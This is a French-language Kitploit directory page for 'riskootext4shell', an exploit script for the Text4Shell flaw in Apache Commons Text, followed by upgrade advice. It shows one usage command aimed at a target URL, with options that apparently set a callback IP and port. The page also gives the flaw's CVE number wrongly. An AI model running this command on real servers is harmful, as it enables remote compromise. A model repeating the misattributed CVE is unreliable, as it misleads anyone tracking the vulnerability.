Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
riskootext4shell — text4shell script pour text coomons < =1.10 CVE-2022-33980 | Kitploit
Outils/GitHubGitHub/joseluisinigo/riskootext4shell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubjoseluisinigo/riskootext4shell

riskootext4shell

text4shell script pour text coomons < =1.10 CVE-2022-33980

Voir le dépôt
111il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

riskootext4shell

script text4shell pour Apache Commons Text <= 1.10 CVE-2022-33980

  • La bibliothèque Apache Commons Text est une librairie alternative aux fonctionnalités natives du JDK Java.
  • Versions antérieures à la version 1.10.0 d'Apache Commons
  • Similaire à CVE-2022-33980
root@kitploit:~
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22

Atténuation

La solution principale consiste à mettre à jour d'urgence le composant Apache Commons Text vers les versions disponibles qui corrigent cette vulnérabilité. Concrètement, mettez à jour vers une version 1.10.0 ou ultérieure d'Apache Commons Text.

Dans cette mise à jour, les substitutions problématiques ont été désactivées par défaut. Le fichier changelog de la librairie inclut la modification suivante :

Rendre les recherches de chaînes par défaut configurables via une propriété système. Supprimer les recherches dns, url et script des valeurs par défaut. Si ces recherches sont nécessaires pour une utilisation dans StringSubstitutor.createInterpolator(), elles doivent être activées via une propriété système. Voir StringLookupFactory pour les détails.

Apache a publié un communiqué contenant les informations officielles et une référence à la mise à jour qui corrige le problème.

Télécharger l’outil